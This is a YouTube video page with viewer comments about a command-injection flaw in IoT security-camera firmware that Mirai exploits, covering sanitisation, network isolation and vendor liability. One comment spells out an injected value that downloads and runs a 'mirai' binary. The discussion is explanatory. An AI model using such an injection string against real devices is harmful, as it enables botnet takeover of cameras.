this vulnerability shouldn’t even exist

Поделиться
HTML-код
  • Опубликовано: 17 дек 2024

Комментарии • 957

  • @LowLevelTV
    @LowLevelTV  3 месяца назад +58

    go check out lowlevel.academy 😎

    • @regurmaster3519
      @regurmaster3519 3 месяца назад +2

      Need student discount too costly for Indian students from middle class family

    • @Mohojo
      @Mohojo 3 месяца назад +1

      Hey Ed, Why not create a course for reverse engineering?

    • @PremiereStoss-qm9un
      @PremiereStoss-qm9un 3 месяца назад +1

      Hey Ed, are your courses beginner friendly? I have been learning C and still very much a newbie. I am interested in your courses, mainly C and Assembly. However, you are so advanced in your knowledge that I am nervous about joining to find out that it is way over my skill level, etc. I really am looking for an assembly that is ZERO to Hero type of course....

    • @sprinteroz2239
      @sprinteroz2239 3 месяца назад

      is there a firmware that works on most cameras that is safe to use ?

    • @davidcraig8106
      @davidcraig8106 3 месяца назад

      you should bring up this vid to Wendell at Level 1 Techs
      EDIT: he said years ago there's no standards. he even was working on setting up a DMZ type thing that looked at every single packet that went in and out of the IoT devices he used. without standards and open source, IoT is a risk to int'l security. maybe not the gov't, but int'l meaning the internet as we know it.

  • @martinzihlmann822
    @martinzihlmann822 3 месяца назад +3194

    the S in IoT stands for Security

  • @josephlabs
    @josephlabs 3 месяца назад +365

    0 sanitization on inputs that has a connection to system calls is insane.

    • @pfqniet
      @pfqniet 3 месяца назад +45

      What's crazy is that there *is* sanitisation. Just above the offending line there is a line that removes character 0x22 from the input. That is the double-quote character, which would indeed be a way to attack the injection vulnerability. So somebody thought to defend against a possible injection, and still botched it. In this case, I would presume the LED value should be a number so just... Use %d instead of %s???

    • @InventiveDingo
      @InventiveDingo 3 месяца назад +13

      ​@@pfqnietThere's technically at least one extra step required (strtol() or similar to parse the string to a number), but yes, not hard. Maybe some quick range checks for good measure. When validating input, always validate maximally.
      Of course, running shell commands is the wrong way to do this anyway. I would reject this code review and have a friendly chat with the author.

    • @bothieGMX
      @bothieGMX 3 месяца назад +7

      Always whitelist valid input and reject everything else. However you do it, doesn't matter.

    • @ChasOwens
      @ChasOwens 3 месяца назад +12

      @@pfqniet You can’t just change the %s to a %d; pcVar2 is a string (which is insane because they already are parsing it into an int). A better thing would be to use the iVar4 variable instead and then use %d. But even that is wrong. Look at what the commandline code is doing: writing a value to a file. This is pure laziness. The programmer should have just opened the /proc/driver/pwm file and written iVar4 to it. That would have removed even the possibility of a commandline injection since no shell would be launched. It even would be more efficient.

    • @ohokcool
      @ohokcool 3 месяца назад +8

      Reminds me of when I accidentally put a backslash at the end of a password (because it’s right next to the enter key) and due to lack of sanitization it crashed the whole system that it was running on. 😂 I’m not going to say which company but it was a massive one that put the services in the hands of 2 people who didn’t think to sanitize password fields

  • @coreymartin9630
    @coreymartin9630 3 месяца назад +498

    This 100% counts as gross negligence, if my crappy online Python course can do user input validation, a _security_ company should be able to

    • @CrimeyCenter
      @CrimeyCenter 3 месяца назад +59

      Not when they hire the lowest common denominator coders and don't do your own penetration testing and code reviews with security experts.

    • @JJFX-
      @JJFX- 3 месяца назад +38

      Hell, I've made batch files that do a better job at input validation than this.

    • @kentacy69
      @kentacy69 3 месяца назад +40

      @@CrimeyCenter that sounds... Grossly negligent

    • @edwardallenthree
      @edwardallenthree 3 месяца назад +17

      Exactly! This is a classic injection vulnerability. It might as well serve as an example of what not to do, and reminds me of several examples of what not to do when I learned how to do CGI programming in Perl in the 1990s.
      Why are they using the shell to do this? Why are they that lazy?

    • @jino139
      @jino139 3 месяца назад +3

      There's no good pay for embedded systems cybersec positions.

  • @xXYourShadowDaniXx
    @xXYourShadowDaniXx 3 месяца назад +993

    And THIS is why you run your Smarthome devices in their own VLAN with NO access to your other VLANs

    • @nicholasj3213
      @nicholasj3213 3 месяца назад +190

      Basically impossible for regular people.

    • @andreffrosa
      @andreffrosa 3 месяца назад +162

      Regular "routers" don't allow you to even do that even if people knew how

    • @monkemode8128
      @monkemode8128 3 месяца назад +38

      ​@@nicholasj3213Yeah and for many it would require new devices. Unless you made your purchasing decisions with that in mind, but the average person doesn't.

    • @scheimong
      @scheimong 3 месяца назад +94

      This. I had all my IP cameras placed into a VLAN that can only talk to one specific local IP which hosts my NVR software (Frigate), which runs in a non-privileged container (podman is great), on an SELinux-enabled RockyLinux 9 box. If an attacker can break in and out of this onion they can have all my data 😁

    • @RiversJ
      @RiversJ 3 месяца назад +8

      @andreffrosa That sadly is just a case of you get what you pay for, going with the ISPs wormbox or getting the cheapest option despite most people knowing someone atleast slightly technical person to ask for recommendations.

  • @henrijohansson2482
    @henrijohansson2482 3 месяца назад +501

    0:36 missed opportunity to say "Another day and another Zero-Day"

    • @MessyMasyn
      @MessyMasyn 3 месяца назад +1

      sounds like the opening to a song

    • @subtlewolf
      @subtlewolf Месяц назад

      day %= 2

    • @ExEBoss
      @ExEBoss Месяц назад +1

      ⁠@@subtlewolf Actually, it’d be `day %= 1`

    • @ExEBoss
      @ExEBoss Месяц назад

      @@subtlewolf Actually, it’d be day modulo 1

    • @ExEBoss
      @ExEBoss Месяц назад

      *@subtlewolf*
      Actually, it would be day modulo 1
      *(RUclips* bots keep eating my comments)

  • @PeterZaitcev
    @PeterZaitcev 3 месяца назад +93

    Wait a second, why is it unpatchable if it allows executing external code? You could install the update _fixing_ that vulnerability _using_ that vulnerability!

    • @zombieregime
      @zombieregime 3 месяца назад +23

      Yes. And there have been computer viruses that fixed vulnerabilities the vendors refused to address. There was at least one that I know of regarding an ISP router.

    • @ujiltromm7358
      @ujiltromm7358 2 месяца назад +13

      There are also viruses that fix the vulnerabilities they use to penetrate the victim system, so other bad actors can't enter through the same door. It do be a competitive environment.

    • @Bomkz
      @Bomkz 2 месяца назад

      @@ujiltromm7358 there's also that story of a business opting not to remove a cryptomining malware because the ones who made it kept their systems updated and patched out any other people trying to hack it just to keep it to themselves.

    • @fomxgorl
      @fomxgorl 18 дней назад

      ​@@ujiltromm7358yep. there was one person who wrote a log4j program whos sole purpose was to patch log4j vulnerabilities

  • @paulramasco6769
    @paulramasco6769 3 месяца назад +239

    I didn't realize Mirai was still going on. For my cybersecurity class a few years ago I did a report on zombie botnets and this was a major thing. Its crazy that camera vendors (who Mirai was targeting before) didn't shore up that hole.

    • @V3racious3
      @V3racious3 3 месяца назад +11

      It isn't a specific hole. That''s what she said.

    • @asteriks_hardcore
      @asteriks_hardcore 3 месяца назад +13

      Mirai, qbot and other families never stopped being active, due to there being hundreds of variants

    • @ZippyZen-pw5uq
      @ZippyZen-pw5uq 3 месяца назад +3

      camera vendors: meh
      (continues spinning in chair)

    • @davidcraig8106
      @davidcraig8106 3 месяца назад +3

      They care about profits and not security. Like seriously. Camera software isn't open source. There's no standards. How in the hell is the average consumer supposed to know. We need standards yesterday and a campaign to say just what is and what isn't acceptable.

    • @gamersunite9026
      @gamersunite9026 3 месяца назад +1

      mirai is MOST DEFINITELY still going on. bunch of servers still getting requests from the botnet to try and backdoor through /cgi-bin/

  • @Ilix42
    @Ilix42 3 месяца назад +107

    Man, "spray and pray" is never how you want a successful security breach to be described.

  • @Car0linaPh03nix
    @Car0linaPh03nix 3 месяца назад +149

    I disagree about vendors not making firmware available. Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone? The issue is vendors writing shitty code and, more importantly, either not patching it when vulns are found, or, often, not even having the capability to patch it.

    • @TrippSC2
      @TrippSC2 3 месяца назад +17

      I think the worst of all possibilities is to have unencrypted firmware available without source. If the source was available, you at least increase the likelihood that security researchers may at least have a chance to catch bugs and propose fixes.

    • @Adesterr
      @Adesterr 3 месяца назад +20

      The golden rule in IT security is "obscurity is not security". This doesn't mean that keys should be published like microsoft likes do to "accidentally", but that the algorithm to protect something shouldn't rely on not being published. In the end it comes down to just desoldering the ROM with the firmware and reading its content.
      So, yes, every professional IT security expert will tell you that the Firmware should not rely on being a secret.

    • @TrippSC2
      @TrippSC2 3 месяца назад +3

      @@Adesterr If your point is that obscurity shouldn't be the entirety of your security strategy, we're in total agreement. My point is that, from a practical standpoint if making source available is off the table, obscuring the firmware provides some level of deterrence from the exploit being exposed. This along with diligent internal testing and code quality standards is a more reasonable security strategy than not obscuring the firmware.

    • @nomore6167
      @nomore6167 3 месяца назад +2

      "Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone?" - It is not more secure. More accurately, the question of whether open source software is more or less secure than closed software is unknowable because we don't know how secure either category really is. I would, however, point to Ed's 21 April 2024 video, "this is a warning to anyone using php", which highlighted a 24-year-old buffer overflow vulnerability in glibc. If "it can be audited by anyone" really meant superior security, then that vulnerability would not have persisted for 24 years. I do agree with your original point, however -- the firmware should be available, and security through obscurity is no security at all.

    • @ErazerPT
      @ErazerPT 3 месяца назад

      It's neither. If the code is secure, both people checking it for "secure" or "vulnerable" will find nothing. Now if it's NOT secure, and let's assume 100% competency, IF you have someone checking it for security they will spot it. IF. And IF it's any software with any decent amount of users, someone WILL be looking for vulns and spot it. The "many eyes" thing only works IF there's actually many (competent) eyes looking out for things...

  • @Trenjeska
    @Trenjeska 3 месяца назад +185

    Full access to firmware is not a bad thing. In fact, it should be a requirement for any device. How else are you going to re-flash the device or maintain it without dependency on the manufacturer that may or may not exist anymore?

    • @gairisiuil
      @gairisiuil 3 месяца назад +56

      security by obscurity is always safe until isn't, at which point it REALLY isn't

    • @sasjadevries
      @sasjadevries 3 месяца назад +22

      Why does this security camera have an operating system like linux to begin with?
      All it needs is 1) a bootloader, 2) minimalist networking software, 3) video encoding stuff, and some encryption algorithm that can be part of the networking binary or the video binary.
      The whole thing could be a single binary and be fully embedded, or it can be a few binaries running on freeRTOS.
      Why would a camera need wget? Why would it need bash? What's the upgrade path of "a camera"???

    • @chocolate_squiggle
      @chocolate_squiggle 3 месяца назад +14

      @@sasjadevries A crappy standalone camera I bought 10 years ago had its own embedded HTTP server, so you could configure all sorts of options. Not all of them connect to a central controller.

    • @mapu1
      @mapu1 3 месяца назад +9

      @@sasjadevries lets you do facial recognition and stuff locally, and compress the archives and so on. If you are doing bunch of stuff like that, at a point you are better off just using linux, cause you just let the user put on whatever they want on it instead of writing custom software and drivers.
      That said just don't connect your stuff directly to the internet. It's gonna get hacked.

    • @sasjadevries
      @sasjadevries 3 месяца назад +3

      @@mapu1 That is a good point, but with a catch.
      I would rather do "local" object recognition on a server that multiple cameras connect into. Mix and match any server with any software and any camera, without vendor lock-in. The cameras could be just wired analog ones, or at most something digitally compressed.
      Doing all the processing on the camera itself would make sense if you install the camera in a way that it can be jammed, because it has to be wireless, because it's on moving subject. Or if you only need one or two cameras for your property, and have no plans for expanding surveillance later.

  • @luxploit
    @luxploit 3 месяца назад +101

    I think Ed's old Router is a Netgear Nighthawk, probably an R7000. I recognise the hideous casing and 3 way antenna setup. I flashed mine with FreshTomato, way better then NG's stock fw

    • @chinesepopsongs00
      @chinesepopsongs00 3 месяца назад +3

      My Guess was the R6400 because the PCB layout is different. Unless there is a revision of the R7000 that looks like the R6400 which i have never seen then i think it must be a R6400.

    • @VladSuperKat
      @VladSuperKat 3 месяца назад +3

      Or Tp-Link those were forever vulnerable routers :D

    • @reaperinsaltbrine5211
      @reaperinsaltbrine5211 3 месяца назад +1

      @@VladSuperKat Yupp...but you can change the firmware on them. The worst was the blunder when they changed the chipset from Marwell to some Broadcom crap: oh boy, are those vulnerable at the hardware level :D

    • @kirglow4639
      @kirglow4639 3 месяца назад

      Was about to guess Netgear. Welp

    • @jongeduard
      @jongeduard 3 месяца назад

      At least with a google search I could find photographs and articles about it, the shape of these Netgear routers is pretty recognizable. And I new about the trademark that it's known for the problems.

  • @Jirodyne
    @Jirodyne 3 месяца назад +124

    Companies, I would argue ARE 100% Liable, under Express Warranty. If you buy a product, they are expressing a warranty that there is nothing critically wrong or harmful with that item. A massive issue like this? I would 100% argue that breaks warranty and they are 100% Liable for any damage caused by the virus that was installed on your device because of their negligence of securing the device.
    But then again, I'm not a lawyer, and the courts don't care about consumers would side with the company who is paying them behind the scenes.

    • @JJFX-
      @JJFX- 3 месяца назад +11

      If they made no significant attempts at resolving the issue you probably could but the courts are notoriously behind the times on these issues. The other problem is how many of these products flooding Amazon are just overseas companies.

    • @jbird4478
      @jbird4478 3 месяца назад +19

      Software companies are notoriously exempt from liability. Almost every software product has a user agreement that basically tells you they are not responsible even if the software is entirely unfit for its purpose and accidentally blows up your house instead. The degree to which such user agreements can be uphold in the court of law varies, but in general it does. Judges know nothing about software so they rely on industry experts, who basically explain them it's some sort of extremely complex magic that cannot possibly come with any sort of guarantees.

    • @sasjadevries
      @sasjadevries 3 месяца назад +11

      @@jbird4478 Except that's for the software itself, not for the physical hardware product that just happened to contain that software.
      It's the responsibility of the manufacturer of the IoT device to figure this out. Either they develop their own stuff, or they can test open software, or they can hire a software company that's certified and has liability written in the contract.
      If an IoT device burns your house down, then it doesn't matter if it's a hardware problem or a software bug.

    • @forlexer
      @forlexer 3 месяца назад +1

      Go sue China....oh wait you can't

    • @LTPottenger
      @LTPottenger 3 месяца назад +1

      Judges decide any case however they want, including jury trials because they control exactly what the jury sees. So in the miu case they did not show the video of the 'children' attacking the old man only selected still photos, for example.

  • @HinaraT
    @HinaraT 3 месяца назад +85

    The worst part is that the bug would not have occured if they just simply wrote directly to the file as the kernel would have refused it.....

    • @timoadler6356
      @timoadler6356 3 месяца назад +5

      indeed. What's this whole echo and redirection stunt for anyway? Does the shell have higher priv than the cgi Factory binary or what?

    • @AubreyBarnard
      @AubreyBarnard 3 месяца назад +4

      @@timoadler6356 I'm guessing that the echo is just a shortcut in the code to writing to the particular file, as @TheRobbix1206 describes. I'm guessing that one can control the brightness by writing certain values into that particular file, just like one can control the swapiness of the Linux kernel by writing into '/proc/something/swapiness'. (I don't remember the specific file, but hopefully you still understand what I'm trying to say.)

    • @AubreyBarnard
      @AubreyBarnard 3 месяца назад

      ​@@timoadler6356(I forgot:) That is, I don't think it has anything to do with privilege escalation. (I'd have to go back and watch the video again to make sure, by carefully noting what was executed and with what specific file(s).)

    • @AubreyBarnard
      @AubreyBarnard 3 месяца назад +2

      Yeah, it's as I thought. After zooming in (on my hand computer that has radios), the specific shell command is `echo DUTY_RATIO="%s" > /proc/driver/pwm`. So it looks like 'pwm' is a virtual file where one can write certain configuration to control the camera. (The camera reads that file, parses it, and acts accordingly.) So, while the kernel wouldn't prevent access to that file (as OP suggests), presumably the parser for that file would error out upon finding an arbitrary string instead of the expected literal atomic value (float? int? word?), much less executing said arbitrary string, which could be something like `DUTY_RATIO=wget 0.0.0.0 -o /mirai && /mirai`.

    • @AubreyBarnard
      @AubreyBarnard 3 месяца назад +3

      @TheRobbix1206 If the binary has permission to execute a shell command that writes to a file, then the binary should have permission to write directly to that file, so the kernel wouldn't deny opening the file (unless the effective user somehow got changed, but I don't see anything in the code that does that).

  • @Lupinicus1664
    @Lupinicus1664 3 месяца назад +13

    You are providing a great service, both by explaining interesting topical exploits but also by providing real courses to get people better educated. I am now retired after 40+ years in IT, starting with 25 years of assembly programming on realtime kernels in the mainframe world, then transitioning to security. Lack of knowledge about how the machines actually work is very common amongst modern programmers. Improvements in knowledge should lead to more secure architectures and code. Please keep up the good work.

  • @makebreakrepeat
    @makebreakrepeat 3 месяца назад +44

    10:07 Thanks LLL, your the best

    • @mcJOLLUX
      @mcJOLLUX 3 месяца назад

      @@makebreakrepeat quote

    • @be1tube
      @be1tube 3 месяца назад

      Replying. Agreeing. (algo bait)

    • @1337bitcoin
      @1337bitcoin 3 месяца назад

      This

    • @Egryzilon
      @Egryzilon 3 месяца назад

      Agreed

    • @ByronKirby
      @ByronKirby 3 месяца назад

      Had to zoom in and it was a bit fuzzy, but certainly legible. Thanks LLL

  • @madson-web
    @madson-web 3 месяца назад +72

    "the internet of things sucks" YES

    • @Kane0123
      @Kane0123 3 месяца назад +10

      Buying smart devices is ironically a dumb thing to do.

  • @DadofScience
    @DadofScience 3 месяца назад +13

    I've not embraced IoT stuff because I have no faith in businesses to create products that are "safe" if they have no external obligation to do so. For example, pharmaceuticals are heavily regulated for good reason because they have the potential to cause great harm. I don't want stuff like that in my home, thanks.
    Great work, Ed.

  • @naimah92
    @naimah92 3 месяца назад +147

    The attitude of “it’s just software” needs to go away. There needs to be an engineering rigor applied to get correct(ish) and safe software. We don’t allow civil engineers to self certify so why are we doing that with software?

    • @glynnetolar4423
      @glynnetolar4423 3 месяца назад +18

      This started in the 70s where software was given special consideration. No consumer protections, licensing restrictions, etc. Maybe these things and CrowdStrike may change things.

    • @rethardotv5874
      @rethardotv5874 3 месяца назад

      @@glynnetolar4423because everybody and their mom can write software and publish it. This is anti elitist, anarchistic and awesome for all of us.
      Medical device software needs to be certified bc it can kill ppl but nobody got ever killed by a software bug in a surveillance cam.

    • @andrewpredmore2968
      @andrewpredmore2968 3 месяца назад +12

      It's supply and demand. The need for software developers has grown exponentially (even logarithmically) over the last few decades. There are literally tens of millions of developers all over the world, and I would bet 99% of them do not have anything near a masters degree in engineering. Even if all companies required them to get advanced degrees and were willing to pay for that, there just aren't enough schools that could handle the load.
      And let's face it, most developers just start out working on business logic in spreadsheet macros, or modifying JavaScript. Eventually, they are asked to work on something that is over their head.

    • @sasjadevries
      @sasjadevries 3 месяца назад +13

      There are quite strict rules for certain categories of software, OD-178, iso26262 and the whole safety-critical branch for medical equipment, aviation, etc.
      Then the smarter governments usually have certifications for software handling personal data, payments, etc.
      But this stuff should just be broader, such that you had at least some of this for software in household appliances.

    • @sasjadevries
      @sasjadevries 3 месяца назад

      @@andrewpredmore2968 I would argue, that this demand is unjustified.
      Firstly, most agile developers are like stacking a framework on top of a framework, for something that could have been vanilla html+css generated from some markdown. Or they are shell scripting and pipelining filtering software A into filtering software B into conversion software, for what could have been a single shader.
      Secondly, these soydevs mess up, so you need another soy dev fixing (i.e. ducktaping) the other's work, and a scrum master and a selfproclaimed tester.
      Thirdly, even a small businesses, like a local bakery with 3 locations in your city, feels like it needs it's own app, because a website and PWA is not enough. And why would people make a few good tools, when you could make thousands of mediocre ones?
      Finally, that spreadsheet script is usually for a job that could have been automated away, and shouldn't have been done in a spreadsheet to begin with.
      p.s. ducktape is not a typo, "duck" is the canvas that the tape was made out of, before it was used for ducts😆.

  • @lorenzopazzification
    @lorenzopazzification 3 месяца назад +20

    It's funny that the vulnerability is in the line with the "safe_printf"

  • @von...
    @von... 3 месяца назад +78

    "thanks Triple L, you're the best! I am a ***generic mobile user agent*** and I am very ***positive adjective*** that you were thinking of us!"
    ***actually viewing on a 1000:45 mega ultrawide with 10k smell-o-vision***
    "...pft they dont even know im only pretending to be a mobile user"

    • @neniugrava
      @neniugrava 3 месяца назад +3

      I'm a mobile user agent, and I approve this message

  • @LUEcifer
    @LUEcifer 3 месяца назад +80

    Router looks like a Netgear Nighthawk R7000.

    • @YaySyu
      @YaySyu 3 месяца назад +6

      Nighthawk lineup are insecure.

    • @OVERKILL_PINBALL
      @OVERKILL_PINBALL 3 месяца назад

      @@YaySyu What about when you run DD-WRT or OPEN-WRT latest kernels?

    • @MelroyvandenBerg
      @MelroyvandenBerg 3 месяца назад +1

      R6700

    • @MelroyvandenBerg
      @MelroyvandenBerg 3 месяца назад +3

      Why not just install OpenWRT?

    • @YaySyu
      @YaySyu 3 месяца назад +6

      @@MelroyvandenBerg You cant do it on most of them without flashing the board. I had to open mine up to flash it.

  • @thecakeredux
    @thecakeredux 3 месяца назад +6

    Literally in my very first lesson on C way back when, I learned what input sanitization is.

  • @slugfiller
    @slugfiller 3 месяца назад +7

    The bigger question is: Why `echo` into a file instead of, I dunno... just `fopen`ing the file and writing into it. It's not like `echo` is some sort of black magic, nor is the bash file pipe operation. I can't imagine that a program that can execute bash doesn't have access to `fopen`.

  • @MSThalamus-gj9oi
    @MSThalamus-gj9oi 3 месяца назад +9

    When people first started talking about networking elements and appliances in the home, I thought it was a pretty neat idea. When that became a reality and all those devices were connected to the Internet, I thought people were absolutely *insane* for using any of them. The closest thing to an IoT device I use is a Roku, and i'm happy to keep it that way. I even disable networking on my retro gaming PCs.

    • @nomore6167
      @nomore6167 3 месяца назад

      But how will I cook my food if my microwave can't connect to the Internet? How will I heat my home if my thermostat can't connect to the Internet? How will I know when my laundry is done if my washer and dryer can't connect to the Internet?

    • @MSThalamus-gj9oi
      @MSThalamus-gj9oi 3 месяца назад

      @@nomore6167 I mean, I get that you're joking, but it'll get to that point! It's already true that, where I live, I need to have a cell phone with its own separate data plan in order to activate a new modem for my cable broadband service. It's just ludicrous, but it's true....

    • @nomore6167
      @nomore6167 3 месяца назад

      @@MSThalamus-gj9oi Sadly, I believe you're right that it'll eventually get to that point. Either probably be a combination of people's laziness/"convenience" (wanting to be able to access everything from their phone), company greed (data collection / analytics for everything), company control, and planned obsolescence. Personally, I think it's bad enough right now when we need to go to a company's website to download the user manual for pretty much everything.

    • @nomore6167
      @nomore6167 3 месяца назад

      @@MSThalamus-gj9oi With regard to needing a cell phone to activate a new modem for your cable broadband service, what's the reason for that (if you don't mind me asking)? If it's because it requires an app, then it's even worse than simply requiring a cell phone; it'll probably require a relatively new cell phone because most companies will support only the latest device OS and maybe the one before that. I'm at that point right now with Capital One, my credit card provider. I have an iPhone 6s. Sure, it's 8 years old, but it does everything I need it to do. Except Apple doesn't allow this phone to upgrade to iOS 16.0 or above, and the Capital One app now requires iOS 16.0 or above. More accurately, the app says it supports my phone, and it will install on my phone, but when you open it, it says you need to upgrade to the latest iOS. So I lost the ability to get realtime notifications (about new charges, payment confirmation, fraud alerts, etc) and control my credit card from my phone simply because I refuse to buy a new phone.

  • @benarcher372
    @benarcher372 3 месяца назад +6

    Why is anyone surprised that bugs like this exist? The number of connected devices out there is enormous. The companies developing these are probably more interested in launching the product than spending yet another dollar on testing or implementing a safer language. I have no idea how to fight this. Regulation? Informed users? Videos like this :-) -> definitely! Thanks for a good walk-through.

  • @D4MNF0xy
    @D4MNF0xy 3 месяца назад +8

    I'm always baffled by how those companies apparently never use code scans.
    I've actually made a similar mistake, that got flagged by a code scan before any deployment.
    I forgot to check one input which resulted in a potential full read access for the server directory.
    Joke is: I've could have sworn, that I did the check in the other module.

  • @ewhac
    @ewhac 3 месяца назад +7

    ...I _cannot_ believe that code passed any kind of review. "Y'know, I could write three lines of code that fopen()s a file and fprintf()s to it, but that's for suckers. I think I will _LAUNCH A SHELL TO RUN AN ECHO COMMAND!"_
    Anyone in the chain who let those lines of code pass by them (in that screenshot there's at least two other examples of completely unnecessary shell commands) -- from the original coder to the reviewers to the release engineers to the managers of same -- should find themselves in front of HR arguing why they should continue to work for the company.

    • @sirgouki6207
      @sirgouki6207 3 месяца назад

      A shell that no one would normally see no less. I worked security at a company I'm not going to name for a specific reason: guess what cameras and software they used?
      To get access to that print out, you gotta jump through some menus and you lose screen real estate, which is something you don't want when you're watching cameras for thieves and accidents. However, we had 3 monitors, so I'd have the camera's on 2 of them as I could fit just about every single camera in the whole warehouse that way, and still see what was happening, and on my left most monitor I had the thing that was displaying these messages and a notepad open. I'm also thankful that they had it set up in a way that my layout was tied to my account on their network, so when I logged into the computer and ran the software everything was already the way I had it, and I didn't have to worry about other guards messing with my shit. I actually was able to notify the people in charge of security multiple times that cameras were malfunctioning before it showed in the software by having that thing up, but the average user would have no idea it was there (I even had to teach the head of security how I did it, because she had no idea it was a thing).

  • @capability-snob
    @capability-snob 3 месяца назад +11

    The punch line is that they call atoi(), but don't use that value in the substitution!

    • @BillLambert
      @BillLambert 3 месяца назад +3

      Came down here for exactly this. They were so close, just use %d and that int var instead of the string... definitely a copy-paste-compile "hey it works" SHIP IT!

  • @c128stuff
    @c128stuff 3 месяца назад +9

    Lol, that flaw is so obvious, seeing the reverse-engineered code just hurts my eyes.

  • @anthonywalker6268
    @anthonywalker6268 3 месяца назад +20

    It's actually better that they do post it, because it has to be fixed on sight.

    • @bits360wastaken
      @bits360wastaken 3 месяца назад +4

      What part of "unpatchable" do you not understand?

    • @anthonywalker6268
      @anthonywalker6268 3 месяца назад +2

      @@bits360wastaken what part of people don't have the power of prophecy do you not understand.

    • @GameDevMadeEasy
      @GameDevMadeEasy 3 месяца назад +12

      @@bits360wastaken But... It is fixable with a new firmware version release. As long as users install the new firmware version, the issue is patched. Yes, it technically is unpatchable because they can't just send the update to the user's device to auto install it, but the post calling it unpatchable is a red herring to begin with as it makes people assume that the issue can't be fixed at all, which is not the case.

    • @EricDMMiller
      @EricDMMiller 3 месяца назад +1

      @@GameDevMadeEasy they could abuse the bug to force the system to download and install a firmware upgrade.

    • @GameDevMadeEasy
      @GameDevMadeEasy 3 месяца назад +1

      @@EricDMMiller Companies can't do something like that as it is unethical and could lead them into legal hot water.

  • @ProfRoxas
    @ProfRoxas 3 месяца назад +4

    right when the exploit was shown, i failed to understand how someone could even do this, like, i fail to process how someone could do this and be like "what could go wrong"
    feels like programming became too accessible and we get vulnerabilities that could be prevented by thinking

  • @rumplstiltztinkerstein
    @rumplstiltztinkerstein 3 месяца назад +48

    There are very creepy people out there that get enjoyment from hacking cameras and recording them live on the dark web. Be very careful with cameras. Even your webcam.

    • @RubyCascade
      @RubyCascade 3 месяца назад +17

      _Especially,_ with your webcam. I have a piece of blue tape over my MacBook’s camera, yes.

    • @rumplstiltztinkerstein
      @rumplstiltztinkerstein 3 месяца назад

      @@RubyCascade Here is some info that I wish I didn't know about: Search for the tag "hacked camera" in adult sites. That raises our paranoia to levels high enough that we want to warn all of our friends about keeping cameras on.

    • @DavidTriphon
      @DavidTriphon 3 месяца назад +7

      @@RubyCascade Once upon a time (10+ years ago) I was told that macbook cameras couldn't be powered without the green light turning on so that you knew it was being used. Later on I was told that it had been true but was no longer true, and could potentially be hacked at a firmware level. I have no idea of the validity of either of those claims.

    • @reaperinsaltbrine5211
      @reaperinsaltbrine5211 3 месяца назад +6

      @@DavidTriphon If you don't have a switch that physically cuts power to it, then it can totally be controlled by software :/ You can actually buy smartphones whithout camera and even microphone (so you need a headset to even use it as a phone). You can even order them to be shipped in tamper-evident packaging :)

    • @Bramble20322
      @Bramble20322 3 месяца назад +1

      @@reaperinsaltbrine5211 Those are prime targets for supply chain attacks, and factories that make consumer stuff arent profiling and hand picking people to assemble shit. I'd actually avoid that stuff like the plague if i was you.
      Tamper-evident packaging is just straight up marketing, its an illusion.

  • @woosix7735
    @woosix7735 3 месяца назад +4

    If its not already regulated, this kind of software absolutly should be. And not just slaping the copany on the wrist when it gets found out, but something to prevent this from happening in the first place.

  • @WaterGame7777
    @WaterGame7777 3 месяца назад +7

    The realization of just "oh.... ohhhhh..... they're really doing " always gets me

  • @Oler-yx7xj
    @Oler-yx7xj 3 месяца назад +7

    I love how even for NSA, translating a word into Russian makes it sound hackerish

  • @dragnl0rd
    @dragnl0rd 3 месяца назад +2

    0:42 Took me a minute to nail it down, but that specific router is the Netgear AC1900 wifi router (r7000). I can tell it's that rather than the AC1750 because yours has the usb port next to the wan port.

    • @GetFitEatRight
      @GetFitEatRight 3 месяца назад

      FreshTomato FW all I'm going to say.

  • @hairetsu
    @hairetsu 3 месяца назад +10

    this is so common, raw dogging http requests is the bread and butter of the tech industry, what validation? what sanitizing? who needs that!

  • @arcticzomb
    @arcticzomb 3 месяца назад +55

    Well, that’s why I keep my security cameras on their own local network :)

    • @RabbitWatchShop
      @RabbitWatchShop 3 месяца назад +4

      Your cameras aren’t safe, either, Mr. 2000s era pre-emoji smiley face

    • @rmp5s
      @rmp5s 3 месяца назад +2

      Werd. Mine are completely segregated...have their own router and everything.

    • @EximiusDux
      @EximiusDux 3 месяца назад

      @@RabbitWatchShop wait until you hear about MSN Messenger and how emojis already existed back then during the early 00s. Some people don't like to use image based smileys / emoji.

    • @methamphetaminer
      @methamphetaminer 3 месяца назад +10

      @@RabbitWatchShop ok mossad

    • @bjorntorlarsson
      @bjorntorlarsson 3 месяца назад +7

      That's why I don't use cameras. Actually, the real reason is that I don't find myself all that photognic anyway.

  • @Fs3i
    @Fs3i 3 месяца назад +6

    11:42 lmao, the noise of someone who is in despair

  • @DarkSwordsman
    @DarkSwordsman 3 месяца назад +2

    I don't see you in my recommended often, but I am glad I clicked on this. I didn't realize you actually went through the binary and what not. It's really cool to see you do a technical dive in a layman-way, rather than just say "there is a vulnerability! ahh!"

  • @aftbit
    @aftbit 3 месяца назад +3

    It looks like they tried to sanitize quotes (the single character 0x22 they remove) but didn't realize that double quotes still allow string interpolation? What I don't get is why don't they pass the atoi'd result into the sprintf? They only compare that value to zero so they can issue an extra disable command. They could have done the zero comparison without converting to an integer, and since they already took atoi, they could have avoided the main security bug by using the integer in the string interpolation. There are two bugs in six lines of code. :/

  • @jay3368
    @jay3368 3 месяца назад

    I am new to all of this and watch because its an interest. I had to go look up what input sanitation was and why you do it in code. After doing that, I watched the part where you explain the vulnerability and it made so much sense

  • @marklonergan3898
    @marklonergan3898 3 месяца назад +4

    They did sanitize the input. They used a function with the word "safe" in its name before the system call, so they have met or exceeded the standard of IoT security.

    • @Rudxain
      @Rudxain 2 месяца назад +1

      I hope this is sarcasm

    • @marklonergan3898
      @marklonergan3898 2 месяца назад +2

      @@Rudxain yes and no. Saying they did sanitize was sarcasm. The jab at the lack of security in IoT wasn't - there is a horrible lack of security across the board

    • @Rudxain
      @Rudxain 2 месяца назад

      @@marklonergan3898 LMAO

  • @Mbro-dq2do
    @Mbro-dq2do 11 дней назад

    Ed your channel is dope man. Thank You from a 46 year old Contractor who missed the boat 15 years ago and now am hooked on the Linux world

  • @JarheadCrayonEater
    @JarheadCrayonEater 3 месяца назад +4

    The lack of security in IoT and "home automation" is a carryover from SCADA. That world has been focused on getting things working so much that they seemed to forget the vulnerabilities.
    I used constantly shake my head at the lack of security in PLC's, and other equipment, used in critical infrastructure and various other kinds of industrial automation. It's a mess, or at least used to be serval years ago.

    • @reaperinsaltbrine5211
